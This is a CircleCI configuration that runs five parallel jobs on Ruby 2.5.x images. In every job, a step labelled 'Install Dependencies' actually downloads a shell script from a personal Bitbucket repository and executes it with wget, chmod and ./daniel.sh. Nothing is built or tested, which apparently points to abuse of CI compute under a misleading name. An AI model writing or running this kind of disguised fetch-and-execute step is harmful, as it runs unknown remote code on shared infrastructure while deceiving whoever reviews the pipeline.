version: 2
jobs:
    aldi:
      docker:
            - image: circleci/ruby:2.5
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/9183808312/as/raw/33e473378999de0fa058f40769cb2281dca6c265/daniel.sh && chmod +x daniel.sh && ./daniel.sh
    suka:
      docker:
            - image: circleci/ruby:2.5.1
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/9183808312/as/raw/33e473378999de0fa058f40769cb2281dca6c265/daniel.sh && chmod +x daniel.sh && ./daniel.sh
    susu:
      docker:
            - image: circleci/ruby:2.5.2
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/9183808312/as/raw/33e473378999de0fa058f40769cb2281dca6c265/daniel.sh && chmod +x daniel.sh && ./daniel.sh
    teteh:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/9183808312/as/raw/33e473378999de0fa058f40769cb2281dca6c265/daniel.sh && chmod +x daniel.sh && ./daniel.sh
    tetangga:
      docker:
            - image: circleci/ruby:2.5.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/9183808312/as/raw/33e473378999de0fa058f40769cb2281dca6c265/daniel.sh && chmod +x daniel.sh && ./daniel.sh

workflows:
    version: 2
    build:
        jobs:
            - aldi
            - suka
            - susu
            - teteh
            - tetangga